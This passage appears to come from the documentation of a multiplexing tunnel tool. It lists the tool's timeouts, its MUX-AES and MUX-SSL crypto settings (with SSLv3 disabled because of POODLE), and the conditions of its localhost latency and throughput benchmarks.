• Read timeout: 5minutes
• MUX Keep-Alive: 30seconds
• MUX-IN Error retry sleep: 0.5/1seconds
• MUX-OUT Error retry sleep: 5seconds
• Reload config check time interval: 10seconds
• For MUX-AES Password-Based Key Derivation Function for 4 keys (2 for Cipher, 2 for Mac) is PBKDF2WithHmacSHA1
• For MUX-AES default Cipher is AES/CTR/NoPadding (128 bits)
• For MUX-AES Mac for Authenticated encryption (Encrypt-then-MAC) is HmacSHA256
• For MUX-AES Randomized IV per-message is used.
• For MUX-AES Rekey is done every 32768 messages (2^15).
• For MUX-AES Anti-replay window for messages (time): 5minutes
• For MUX-AES Anti-replay sequence for messages: 31bits
• For MUX-SSL supported Asymmetric Keys are RSA
• For MUX-SSL enabled Protocols are:
  • TLSv1.2
  • TLSv1.1
  • TLSv1
  • SSLv3 DISABLED POODLE CVE-2014-3566
• Shutdown/Reload timeout: 30seconds
• Statistics print interval: 30seconds

Latency Benchmark

Throughput Benchmark

All test run on localhost on a Laptop. Values are not accurate, but orientative. Latency { EchoServer, 1 byte write/read (end-to-end, round-trip), 100K iterations } Lower Better. Throughput { Chargen, 1024bytes read & write (full-duplex), total 512MBytes } Higher better.